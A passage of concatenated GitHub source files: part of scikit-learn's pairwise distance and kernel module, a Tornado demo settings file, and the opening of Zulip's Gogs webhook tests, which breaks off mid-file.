Read more in the :ref:`User Guide <cosine_similarity>`.
Parameters
----------
X : {ndarray, sparse matrix} of shape (n_samples_X, n_features)
Input data.
Y : {ndarray, sparse matrix} of shape (n_samples_Y, n_features), \
default=None
Input data. If ``None``, the output will be the pairwise
similarities between all samples in ``X``.
dense_output : bool, default=True
Whether to return dense output even when the input is sparse. If
``False``, the output is sparse if both input arrays are sparse.
.. versionadded:: 0.17
parameter ``dense_output`` for dense output.
Returns
-------
kernel matrix : ndarray of shape (n_samples_X, n_samples_Y)
"""
# to avoid recursive import
X, Y = check_pairwise_arrays(X, Y)
X_normalized = normalize(X, copy=True)
if X is Y:
Y_normalized = X_normalized
else:
Y_normalized = normalize(Y, copy=True)
K = safe_sparse_dot(X_normalized, Y_normalized.T, dense_output=dense_output)
return K
def additive_chi2_kernel(X, Y=None):
"""Computes the additive chi-squared kernel between observations in X and
Y.
The chi-squared kernel is computed between each pair of rows in X and Y. X
and Y have to be non-negative. This kernel is most commonly applied to
histograms.
The chi-squared kernel is given by::
k(x, y) = -Sum [(x - y)^2 / (x + y)]
It can be interpreted as a weighted difference per entry.
Read more in the :ref:`User Guide <chi2_kernel>`.
Notes
-----
As the negative of a distance, this kernel is only conditionally positive
definite.
Parameters
----------
X : array-like of shape (n_samples_X, n_features)
Y : ndarray of shape (n_samples_Y, n_features), default=None
If `None`, uses `Y=X`.
Returns
-------
kernel_matrix : ndarray of shape (n_samples_X, n_samples_Y)
See Also
--------
chi2_kernel : The exponentiated version of the kernel, which is usually
preferable.
sklearn.kernel_approximation.AdditiveChi2Sampler : A Fourier approximation
to this kernel.
References
----------
* Zhang, J. and Marszalek, M. and Lazebnik, S. and Schmid, C.
Local features and kernels for classification of texture and object
categories: A comprehensive study
International Journal of Computer Vision 2007
https://research.microsoft.com/en-us/um/people/manik/projects/trade-off/papers/ZhangIJCV06.pdf
"""
if issparse(X) or issparse(Y):
raise ValueError("additive_chi2 does not support sparse matrices.")
X, Y = check_pairwise_arrays(X, Y)
if (X < 0).any():
raise ValueError("X contains negative values.")
if Y is not X and (Y < 0).any():
raise ValueError("Y contains negative values.")
result = np.zeros((X.shape[0], Y.shape[0]), dtype=X.dtype)
_chi2_kernel_fast(X, Y, result)
return result
def chi2_kernel(X, Y=None, gamma=1.0):
"""Computes the exponential chi-squared kernel X and Y.
The chi-squared kernel is computed between each pair of rows in X and Y. X
and Y have to be non-negative. This kernel is most commonly applied to
histograms.
The chi-squared kernel is given by::
k(x, y) = exp(-gamma Sum [(x - y)^2 / (x + y)])
It can be interpreted as a weighted difference per entry.
Read more in the :ref:`User Guide <chi2_kernel>`.
Parameters
----------
X : array-like of shape (n_samples_X, n_features)
Y : ndarray of shape (n_samples_Y, n_features), default=None
gamma : float, default=1.
Scaling parameter of the chi2 kernel.
Returns
-------
kernel_matrix : ndarray of shape (n_samples_X, n_samples_Y)
See Also
--------
additive_chi2_kernel : The additive version of this kernel.
sklearn.kernel_approximation.AdditiveChi2Sampler : A Fourier approximation
to the additive version of this kernel.
References
----------
* Zhang, J. and Marszalek, M. and Lazebnik, S. and Schmid, C.
Local features and kernels for classification of texture and object
categories: A comprehensive study
International Journal of Computer Vision 2007
https://research.microsoft.com/en-us/um/people/manik/projects/trade-off/papers/ZhangIJCV06.pdf
"""
K = additive_chi2_kernel(X, Y)
K *= gamma
return np.exp(K, K)
# Helper functions - distance
PAIRWISE_DISTANCE_FUNCTIONS = {
# If updating this dictionary, update the doc in both distance_metrics()
# and also in pairwise_distances()!
"cityblock": manhattan_distances,
"cosine": cosine_distances,
"euclidean": euclidean_distances,
"haversine": haversine_distances,
"l2": euclidean_distances,
"l1": manhattan_distances,
"manhattan": manhattan_distances,
"precomputed": None, # HACK: precomputed is always allowed, never called
"nan_euclidean": nan_euclidean_distances,
}
def distance_metrics():
"""Valid metrics for pairwise_distances.
This function simply returns the valid pairwise distance metrics.
It exists to allow for a description of the mapping for
each of the valid strings.
The valid distance metrics, and the function they map to, are:
=============== ========================================
metric Function
=============== ========================================
'cityblock' metrics.pairwise.manhattan_distances
'cosine' metrics.pairwise.cosine_distances
'euclidean' metrics.pairwise.euclidean_distances
'haversine' metrics.pairwise.haversine_distances
'l1' metrics.pairwise.manhattan_distances
'l2' metrics.pairwise.euclidean_distances
'manhattan' metrics.pairwise.manhattan_distances
'nan_euclidean' metrics.pairwise.nan_euclidean_distances
=============== ========================================
Read more in the :ref:`User Guide <metrics>`.
"""
return PAIRWISE_DISTANCE_FUNCTIONS
def _dist_wrapper(dist_func, dist_matrix, slice_, *args, **kwargs):
"""Write in-place to a slice of a distance matrix."""
dist_matrix[:, slice_] = dist_func(*args, **kwargs)
def _parallel_pairwise(X, Y, func, n_jobs, **kwds):
"""Break the pairwise matrix in n_jobs even slices
and compute them in parallel."""
if Y is None:
Y = X
X, Y, dtype = _return_float_dtype(X, Y)
if effective_n_jobs(n_jobs) == 1:
return func(X, Y, **kwds)
# enforce a threading backend to prevent data communication overhead
fd = delayed(_dist_wrapper)
ret = np.empty((X.shape[0], Y.shape[0]), dtype=dtype, order="F")
Parallel(backend="threading", n_jobs=n_jobs)(
fd(func, ret, s, X, Y[s], **kwds)
for s in gen_even_slices(_num_samples(Y), effective_n_jobs(n_jobs))
)
if (X is Y or Y is None) and func is euclidean_distances:
# zeroing diagonal for euclidean norm.
# TODO: do it also for other norms.
np.fill_diagonal(ret, 0)
return ret
def _pairwise_callable(X, Y, metric, force_all_finite=True, **kwds):
"""Handle the callable case for pairwise_{distances,kernels}."""
X, Y = check_pairwise_arrays(X, Y, force_all_finite=force_all_finite)
if X is Y:
# Only calculate metric for upper triangle
out = np.zeros((X.shape[0], Y.shape[0]), dtype="float")
iterator = itertools.combinations(range(X.shape[0]), 2)
for i, j in iterator:
out[i, j] = metric(X[i], Y[j], **kwds)
# Make symmetric
# NB: out += out.T will produce incorrect results
out = out + out.T
# Calculate diagonal
# NB: nonzero diagonals are allowed for both metrics and kernels
for i in range(X.shape[0]):
x = X[i]
out[i, i] = metric(x, x, **kwds)
else:
# Calculate all cells
out = np.empty((X.shape[0], Y.shape[0]), dtype="float")
iterator = itertools.product(range(X.shape[0]), range(Y.shape[0]))
for i, j in iterator:
out[i, j] = metric(X[i], Y[j], **kwds)
return out
_VALID_METRICS = [
"euclidean",
"l2",
"l1",
"manhattan",
"cityblock",
"braycurtis",
"canberra",
"chebyshev",
"correlation",
"cosine",
"dice",
"hamming",
"jaccard",
"kulsinski",
"mahalanobis",
"matching",
"minkowski",
"rogerstanimoto",
"russellrao",
"seuclidean",
"sokalmichener",
"sokalsneath",
"sqeuclidean",
"yule",
"wminkowski",
"nan_euclidean",
"haversine",
]
_NAN_METRICS = ["nan_euclidean"]
def _check_chunk_size(reduced, chunk_size):
"""Checks chunk is a sequence of expected size or a tuple of same."""
if reduced is None:
return
is_tuple = isinstance(reduced, tuple)
if not is_tuple:
reduced = (reduced,)
if any(isinstance(r, tuple) or not hasattr(r, "__iter__") for r in reduced):
raise TypeError(
"reduce_func returned %r. Expected sequence(s) of length %d."
% (reduced if is_tuple else reduced[0], chunk_size)
)
if any(_num_samples(r) != chunk_size for r in reduced):
actual_size = tuple(_num_samples(r) for r in reduced)
raise ValueError(
"reduce_func returned object of length %s. "
"Expected same length as input: %d."
% (actual_size if is_tuple else actual_size[0], chunk_size)
)
def _precompute_metric_params(X, Y, metric=None, **kwds):
"""Precompute data-derived metric parameters if not provided."""
if metric == "seuclidean" and "V" not in kwds:
# There is a bug in scipy < 1.5 that will cause a crash if
# X.dtype != np.double (float64). See PR #15730
dtype = np.float64 if sp_version < parse_version("1.5") else None
if X is Y:
V = np.var(X, axis=0, ddof=1, dtype=dtype)
else:
raise ValueError(
"The 'V' parameter is required for the seuclidean metric "
"when Y is passed."
)
return {"V": V}
if metric == "mahalanobis" and "VI" not in kwds:
if X is Y:
VI = np.linalg.inv(np.cov(X.T)).T
else:
raise ValueError(
"The 'VI' parameter is required for the mahalanobis metric "
"when Y is passed."
)
return {"VI": VI}
return {}
def pairwise_distances_chunked(
X,
Y=None,
*,
reduce_func=None,
metric="euclidean",
n_jobs=None,
working_memory=None,
**kwds,
):
"""Generate a distance matrix chunk by chunk with optional reduction.
In cases where not all of a pairwise distance matrix needs to be stored at
once, this is used to calculate pairwise distances in
``working_memory``-sized chunks. If ``reduce_func`` is given, it is run
on each chunk and its return values are concatenated into lists, arrays
or sparse matrices.
Parameters
----------
X : ndarray of shape (n_samples_X, n_samples_X) or \
(n_samples_X, n_features)
Array of pairwise distances between samples, or a feature array.
The shape the array should be (n_samples_X, n_samples_X) if
metric='precomputed' and (n_samples_X, n_features) otherwise.
Y : ndarray of shape (n_samples_Y, n_features), default=None
An optional second feature array. Only allowed if
metric != "precomputed".
reduce_func : callable, default=None
The function which is applied on each chunk of the distance matrix,
reducing it to needed values. ``reduce_func(D_chunk, start)``
is called repeatedly, where ``D_chunk`` is a contiguous vertical
slice of the pairwise distance matrix, starting at row ``start``.
It should return one of: None; an array, a list, or a sparse matrix
of length ``D_chunk.shape[0]``; or a tuple of such objects. Returning
None is useful for in-place operations, rather than reductions.
If None, pairwise_distances_chunked returns a generator of vertical
chunks of the distance matrix.
metric : str or callable, default='euclidean'
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by scipy.spatial.distance.pdist for its metric parameter, or
a metric listed in pairwise.PAIRWISE_DISTANCE_FUNCTIONS.
If metric is "precomputed", X is assumed to be a distance matrix.
Alternatively, if metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays from X as input and return a value indicating
the distance between them.
n_jobs : int, default=None
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
working_memory : int, default=None
The sought maximum memory for temporary distance matrix chunks.
When None (default), the value of
``sklearn.get_config()['working_memory']`` is used.
`**kwds` : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a scipy.spatial.distance metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Yields
------
D_chunk : {ndarray, sparse matrix}
A contiguous slice of distance matrix, optionally processed by
``reduce_func``.
Examples
--------
Without reduce_func:
>>> import numpy as np
>>> from sklearn.metrics import pairwise_distances_chunked
>>> X = np.random.RandomState(0).rand(5, 3)
>>> D_chunk = next(pairwise_distances_chunked(X))
>>> D_chunk
array([[0. ..., 0.29..., 0.41..., 0.19..., 0.57...],
[0.29..., 0. ..., 0.57..., 0.41..., 0.76...],
[0.41..., 0.57..., 0. ..., 0.44..., 0.90...],
[0.19..., 0.41..., 0.44..., 0. ..., 0.51...],
[0.57..., 0.76..., 0.90..., 0.51..., 0. ...]])
Retrieve all neighbors and average distance within radius r:
>>> r = .2
>>> def reduce_func(D_chunk, start):
... neigh = [np.flatnonzero(d < r) for d in D_chunk]
... avg_dist = (D_chunk * (D_chunk < r)).mean(axis=1)
... return neigh, avg_dist
>>> gen = pairwise_distances_chunked(X, reduce_func=reduce_func)
>>> neigh, avg_dist = next(gen)
>>> neigh
[array([0, 3]), array([1]), array([2]), array([0, 3]), array([4])]
>>> avg_dist
array([0.039..., 0. , 0. , 0.039..., 0. ])
Where r is defined per sample, we need to make use of ``start``:
>>> r = [.2, .4, .4, .3, .1]
>>> def reduce_func(D_chunk, start):
... neigh = [np.flatnonzero(d < r[i])
... for i, d in enumerate(D_chunk, start)]
... return neigh
>>> neigh = next(pairwise_distances_chunked(X, reduce_func=reduce_func))
>>> neigh
[array([0, 3]), array([0, 1]), array([2]), array([0, 3]), array([4])]
Force row-by-row generation by reducing ``working_memory``:
>>> gen = pairwise_distances_chunked(X, reduce_func=reduce_func,
... working_memory=0)
>>> next(gen)
[array([0, 3])]
>>> next(gen)
[array([0, 1])]
"""
n_samples_X = _num_samples(X)
if metric == "precomputed":
slices = (slice(0, n_samples_X),)
else:
if Y is None:
Y = X
# We get as many rows as possible within our working_memory budget to
# store len(Y) distances in each row of output.
#
# Note:
# - this will get at least 1 row, even if 1 row of distances will
# exceed working_memory.
# - this does not account for any temporary memory usage while
# calculating distances (e.g. difference of vectors in manhattan
# distance.
chunk_n_rows = get_chunk_n_rows(
row_bytes=8 * _num_samples(Y),
max_n_rows=n_samples_X,
working_memory=working_memory,
)
slices = gen_batches(n_samples_X, chunk_n_rows)
# precompute data-derived metric params
params = _precompute_metric_params(X, Y, metric=metric, **kwds)
kwds.update(**params)
for sl in slices:
if sl.start == 0 and sl.stop == n_samples_X:
X_chunk = X # enable optimised paths for X is Y
else:
X_chunk = X[sl]
D_chunk = pairwise_distances(X_chunk, Y, metric=metric, n_jobs=n_jobs, **kwds)
if (X is Y or Y is None) and PAIRWISE_DISTANCE_FUNCTIONS.get(
metric, None
) is euclidean_distances:
# zeroing diagonal, taking care of aliases of "euclidean",
# i.e. "l2"
D_chunk.flat[sl.start :: _num_samples(X) + 1] = 0
if reduce_func is not None:
chunk_size = D_chunk.shape[0]
D_chunk = reduce_func(D_chunk, sl.start)
_check_chunk_size(D_chunk, chunk_size)
yield D_chunk
def pairwise_distances(
X, Y=None, metric="euclidean", *, n_jobs=None, force_all_finite=True, **kwds
):
"""Compute the distance matrix from a vector array X and optional Y.
This method takes either a vector array or a distance matrix, and returns
a distance matrix. If the input is a vector array, the distances are
computed. If the input is a distances matrix, it is returned instead.
This method provides a safe way to take a distance matrix as input, while
preserving compatibility with many other algorithms that take a vector
array.
If Y is given (default is None), then the returned matrix is the pairwise
distance between the arrays from both X and Y.
Valid values for metric are:
- From scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
'manhattan']. These metrics support sparse matrix
inputs.
['nan_euclidean'] but it does not yet support sparse matrices.
- From scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis',
'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
'sokalmichener', 'sokalsneath', 'sqeuclidean', 'yule']
See the documentation for scipy.spatial.distance for details on these
metrics. These metrics do not support sparse matrix inputs.
Note that in the case of 'cityblock', 'cosine' and 'euclidean' (which are
valid scipy.spatial.distance metrics), the scikit-learn implementation
will be used, which is faster and has support for sparse matrices (except
for 'cityblock'). For a verbose description of the metrics from
scikit-learn, see the __doc__ of the sklearn.pairwise.distance_metrics
function.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : ndarray of shape (n_samples_X, n_samples_X) or \
(n_samples_X, n_features)
Array of pairwise distances between samples, or a feature array.
The shape of the array should be (n_samples_X, n_samples_X) if
metric == "precomputed" and (n_samples_X, n_features) otherwise.
Y : ndarray of shape (n_samples_Y, n_features), default=None
An optional second feature array. Only allowed if
metric != "precomputed".
metric : str or callable, default='euclidean'
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by scipy.spatial.distance.pdist for its metric parameter, or
a metric listed in ``pairwise.PAIRWISE_DISTANCE_FUNCTIONS``.
If metric is "precomputed", X is assumed to be a distance matrix.
Alternatively, if metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays from X as input and return a value indicating
the distance between them.
n_jobs : int, default=None
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
force_all_finite : bool or 'allow-nan', default=True
Whether to raise an error on np.inf, np.nan, pd.NA in array. Ignored
for a metric listed in ``pairwise.PAIRWISE_DISTANCE_FUNCTIONS``. The
possibilities are:
- True: Force all values of array to be finite.
- False: accepts np.inf, np.nan, pd.NA in array.
- 'allow-nan': accepts only np.nan and pd.NA values in array. Values
cannot be infinite.
.. versionadded:: 0.22
``force_all_finite`` accepts the string ``'allow-nan'``.
.. versionchanged:: 0.23
Accepts `pd.NA` and converts it into `np.nan`.
**kwds : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a scipy.spatial.distance metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Returns
-------
D : ndarray of shape (n_samples_X, n_samples_X) or \
(n_samples_X, n_samples_Y)
A distance matrix D such that D_{i, j} is the distance between the
ith and jth vectors of the given matrix X, if Y is None.
If Y is not None, then D_{i, j} is the distance between the ith array
from X and the jth array from Y.
See Also
--------
pairwise_distances_chunked : Performs the same calculation as this
function, but returns a generator of chunks of the distance matrix, in
order to limit memory usage.
paired_distances : Computes the distances between corresponding elements
of two arrays.
"""
if (
metric not in _VALID_METRICS
and not callable(metric)
and metric != "precomputed"
):
raise ValueError(
"Unknown metric %s. Valid metrics are %s, or 'precomputed', or a callable"
% (metric, _VALID_METRICS)
)
if metric == "precomputed":
X, _ = check_pairwise_arrays(
X, Y, precomputed=True, force_all_finite=force_all_finite
)
whom = (
"`pairwise_distances`. Precomputed distance "
" need to have non-negative values."
)
check_non_negative(X, whom=whom)
return X
elif metric in PAIRWISE_DISTANCE_FUNCTIONS:
func = PAIRWISE_DISTANCE_FUNCTIONS[metric]
elif callable(metric):
func = partial(
_pairwise_callable, metric=metric, force_all_finite=force_all_finite, **kwds
)
else:
if issparse(X) or issparse(Y):
raise TypeError("scipy distance metrics do not support sparse matrices.")
dtype = bool if metric in PAIRWISE_BOOLEAN_FUNCTIONS else None
if dtype == bool and (X.dtype != bool or (Y is not None and Y.dtype != bool)):
msg = "Data was converted to boolean for metric %s" % metric
warnings.warn(msg, DataConversionWarning)
X, Y = check_pairwise_arrays(
X, Y, dtype=dtype, force_all_finite=force_all_finite
)
# precompute data-derived metric params
params = _precompute_metric_params(X, Y, metric=metric, **kwds)
kwds.update(**params)
if effective_n_jobs(n_jobs) == 1 and X is Y:
return distance.squareform(distance.pdist(X, metric=metric, **kwds))
func = partial(distance.cdist, metric=metric, **kwds)
return _parallel_pairwise(X, Y, func, n_jobs, **kwds)
# These distances require boolean arrays, when using scipy.spatial.distance
PAIRWISE_BOOLEAN_FUNCTIONS = [
"dice",
"jaccard",
"kulsinski",
"matching",
"rogerstanimoto",
"russellrao",
"sokalmichener",
"sokalsneath",
"yule",
]
# Helper functions - distance
PAIRWISE_KERNEL_FUNCTIONS = {
# If updating this dictionary, update the doc in both distance_metrics()
# and also in pairwise_distances()!
"additive_chi2": additive_chi2_kernel,
"chi2": chi2_kernel,
"linear": linear_kernel,
"polynomial": polynomial_kernel,
"poly": polynomial_kernel,
"rbf": rbf_kernel,
"laplacian": laplacian_kernel,
"sigmoid": sigmoid_kernel,
"cosine": cosine_similarity,
}
def kernel_metrics():
"""Valid metrics for pairwise_kernels.
This function simply returns the valid pairwise distance metrics.
It exists, however, to allow for a verbose description of the mapping for
each of the valid strings.
The valid distance metrics, and the function they map to, are:
=============== ========================================
metric Function
=============== ========================================
'additive_chi2' sklearn.pairwise.additive_chi2_kernel
'chi2' sklearn.pairwise.chi2_kernel
'linear' sklearn.pairwise.linear_kernel
'poly' sklearn.pairwise.polynomial_kernel
'polynomial' sklearn.pairwise.polynomial_kernel
'rbf' sklearn.pairwise.rbf_kernel
'laplacian' sklearn.pairwise.laplacian_kernel
'sigmoid' sklearn.pairwise.sigmoid_kernel
'cosine' sklearn.pairwise.cosine_similarity
=============== ========================================
Read more in the :ref:`User Guide <metrics>`.
"""
return PAIRWISE_KERNEL_FUNCTIONS
KERNEL_PARAMS = {
"additive_chi2": (),
"chi2": frozenset(["gamma"]),
"cosine": (),
"linear": (),
"poly": frozenset(["gamma", "degree", "coef0"]),
"polynomial": frozenset(["gamma", "degree", "coef0"]),
"rbf": frozenset(["gamma"]),
"laplacian": frozenset(["gamma"]),
"sigmoid": frozenset(["gamma", "coef0"]),
}
def pairwise_kernels(
X, Y=None, metric="linear", *, filter_params=False, n_jobs=None, **kwds
):
"""Compute the kernel between arrays X and optional array Y.
This method takes either a vector array or a kernel matrix, and returns
a kernel matrix. If the input is a vector array, the kernels are
computed. If the input is a kernel matrix, it is returned instead.
This method provides a safe way to take a kernel matrix as input, while
preserving compatibility with many other algorithms that take a vector
array.
If Y is given (default is None), then the returned matrix is the pairwise
kernel between the arrays from both X and Y.
Valid values for metric are:
['additive_chi2', 'chi2', 'linear', 'poly', 'polynomial', 'rbf',
'laplacian', 'sigmoid', 'cosine']
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : ndarray of shape (n_samples_X, n_samples_X) or \
(n_samples_X, n_features)
Array of pairwise kernels between samples, or a feature array.
The shape of the array should be (n_samples_X, n_samples_X) if
metric == "precomputed" and (n_samples_X, n_features) otherwise.
Y : ndarray of shape (n_samples_Y, n_features), default=None
A second feature array only if X has shape (n_samples_X, n_features).
metric : str or callable, default="linear"
The metric to use when calculating kernel between instances in a
feature array. If metric is a string, it must be one of the metrics
in pairwise.PAIRWISE_KERNEL_FUNCTIONS.
If metric is "precomputed", X is assumed to be a kernel matrix.
Alternatively, if metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two rows from X as input and return the corresponding
kernel value as a single number. This means that callables from
:mod:`sklearn.metrics.pairwise` are not allowed, as they operate on
matrices, not single samples. Use the string identifying the kernel
instead.
filter_params : bool, default=False
Whether to filter invalid parameters or not.
n_jobs : int, default=None
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
**kwds : optional keyword parameters
Any further parameters are passed directly to the kernel function.
Returns
-------
K : ndarray of shape (n_samples_X, n_samples_X) or \
(n_samples_X, n_samples_Y)
A kernel matrix K such that K_{i, j} is the kernel between the
ith and jth vectors of the given matrix X, if Y is None.
If Y is not None, then K_{i, j} is the kernel between the ith array
from X and the jth array from Y.
Notes
-----
If metric is 'precomputed', Y is ignored and X is returned.
"""
# import GPKernel locally to prevent circular imports
from ..gaussian_process.kernels import Kernel as GPKernel
if metric == "precomputed":
X, _ = check_pairwise_arrays(X, Y, precomputed=True)
return X
elif isinstance(metric, GPKernel):
func = metric.__call__
elif metric in PAIRWISE_KERNEL_FUNCTIONS:
if filter_params:
kwds = {k: kwds[k] for k in kwds if k in KERNEL_PARAMS[metric]}
func = PAIRWISE_KERNEL_FUNCTIONS[metric]
elif callable(metric):
func = partial(_pairwise_callable, metric=metric, **kwds)
else:
raise ValueError("Unknown kernel %r" % metric)
return _parallel_pairwise(X, Y, func, n_jobs, **kwds)
|
{
"content_hash": "3bb2e5e07fd5415e069afafd195cab50",
"timestamp": "",
"source": "github",
"line_count": 2037,
"max_line_length": 100,
"avg_line_length": 33.72164948453608,
"alnum_prop": 0.6131662080913074,
"repo_name": "shyamalschandra/scikit-learn",
"id": "d493ad68603ea89d0b613947c4f5e0c60b89ecd4",
"size": "69087",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "sklearn/metrics/pairwise.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394788"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "PowerShell",
"bytes": "17312"
},
{
"name": "Python",
"bytes": "6271288"
},
{
"name": "Shell",
"bytes": "6747"
}
],
"symlink_target": ""
}
|
import os
import sys
from tornado.util import ObjectDict
# server name
SERVER_NAME = 'jinja2-support'
# server dir
SERVER_DIR = os.path.dirname(os.path.abspath(__file__))
# project dir
PROJECT_DIR = os.path.dirname(SERVER_DIR)
sys.path.append(PROJECT_DIR)
# tornado web application settings
# details in http://www.tornadoweb.org/en/stable/web.html#tornado.web.Application.settings
WEB_APPLICATION_SETTING = ObjectDict(
static_path=os.path.join(SERVER_DIR, "static"),
template_path=os.path.join(SERVER_DIR, "templates"),
xsrf_cookies=True,
cookie_secret="3%$334ma?asdf2987^%23&^%$2",
)
# turbo app setting
TURBO_APP_SETTING = ObjectDict(
log=ObjectDict(
log_path=os.path.join("", SERVER_NAME+'.log'),
log_size=500*1024*1024,
log_count=3,
),
session_config=ObjectDict({
'name': 'session-id',
'secret_key': 'o387xn4ma?adfasdfa83284&^%$2'
}),
template='jinja2',
)
# check if app start in debug
if os.path.exists(os.path.join(SERVER_DIR, '__test__')):
WEB_APPLICATION_SETTING['debug'] = True
TURBO_APP_SETTING.log.log_path = os.path.join("", SERVER_NAME+'.log')
|
{
"content_hash": "cbbf58f1e87ee6f374695c86a97d56be",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 90,
"avg_line_length": 28.675,
"alnum_prop": 0.6756756756756757,
"repo_name": "tao12345666333/app-turbo",
"id": "dfd6860d20b7ef6f0b42540717a6569fdd04880f",
"size": "1147",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "demos/helloworld/jinja2-support/setting.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1615"
},
{
"name": "JavaScript",
"bytes": "4046"
},
{
"name": "Python",
"bytes": "124548"
}
],
"symlink_target": ""
}
|
from unittest.mock import MagicMock, patch
from zerver.lib.test_classes import WebhookTestCase
from zerver.lib.webhooks.git import COMMITS_LIMIT
class GogsHookTests(WebhookTestCase):
STREAM_NAME = 'commits'
URL_TEMPLATE = "/api/v1/external/gogs?&api_key={api_key}&stream={stream}"
FIXTURE_DIR_NAME = 'gogs'
def test_push(self) -> None:
expected_topic = "try-git / master"
expected_message = """john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 1 commit to branch master. Commits by John (1).
* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))"""
self.check_webhook("push", expected_topic, expected_message)
def test_push_multiple_committers(self) -> None:
commit_info = '* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))\n'
expected_topic = "try-git / master"
expected_message = f"""john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 2 commits to branch master. Commits by Benjamin (1) and John (1).\n\n{commit_info}* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))"""
self.check_webhook("push__commits_multiple_committers", expected_topic, expected_message)
def test_push_multiple_committers_filtered_by_branches(self) -> None:
self.url = self.build_webhook_url(branches='master,development')
commit_info = '* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))\n'
expected_topic = "try-git / master"
expected_message = f"""john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 2 commits to branch master. Commits by Benjamin (1) and John (1).\n\n{commit_info}* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))"""
self.check_webhook("push__commits_multiple_committers", expected_topic, expected_message)
def test_push_filtered_by_branches(self) -> None:
self.url = self.build_webhook_url(branches='master,development')
expected_topic = "try-git / master"
expected_message = """john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 1 commit to branch master. Commits by John (1).
* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))"""
self.check_webhook("push", expected_topic, expected_message)
def test_push_commits_more_than_limits(self) -> None:
expected_topic = "try-git / master"
commits_info = "* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))\n"
expected_message = f"john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 30 commits to branch master. Commits by John (30).\n\n{commits_info * COMMITS_LIMIT}[and {30 - COMMITS_LIMIT} more commit(s)]"
self.check_webhook("push__commits_more_than_limits", expected_topic, expected_message)
def test_push_commits_more_than_limits_filtered_by_branches(self) -> None:
self.url = self.build_webhook_url(branches='master,development')
expected_topic = "try-git / master"
commits_info = "* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))\n"
expected_message = f"john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 30 commits to branch master. Commits by John (30).\n\n{commits_info * COMMITS_LIMIT}[and {30 - COMMITS_LIMIT} more commit(s)]"
self.check_webhook("push__commits_more_than_limits", expected_topic, expected_message)
def test_new_branch(self) -> None:
expected_topic = "try-git / my_feature"
expected_message = "john created [my_feature](http://localhost:3000/john/try-git/src/my_feature) branch."
self.check_webhook("create__branch", expected_topic, expected_message)
def test_pull_request_opened(self) -> None:
expected_topic = "try-git / PR #1 Title Text for Pull Request"
expected_message = """john opened [PR #1](http://localhost:3000/john/try-git/pulls/1) from `feature` to `master`."""
self.check_webhook("pull_request__opened", expected_topic, expected_message)
def test_pull_request_opened_with_custom_topic_in_url(self) -> None:
self.url = self.build_webhook_url(topic='notifications')
expected_topic = "notifications"
expected_message = """john opened [PR #1 Title Text for Pull Request](http://localhost:3000/john/try-git/pulls/1) from `feature` to `master`."""
self.check_webhook("pull_request__opened", expected_topic, expected_message)
def test_pull_request_closed(self) -> None:
expected_topic = "try-git / PR #1 Title Text for Pull Request"
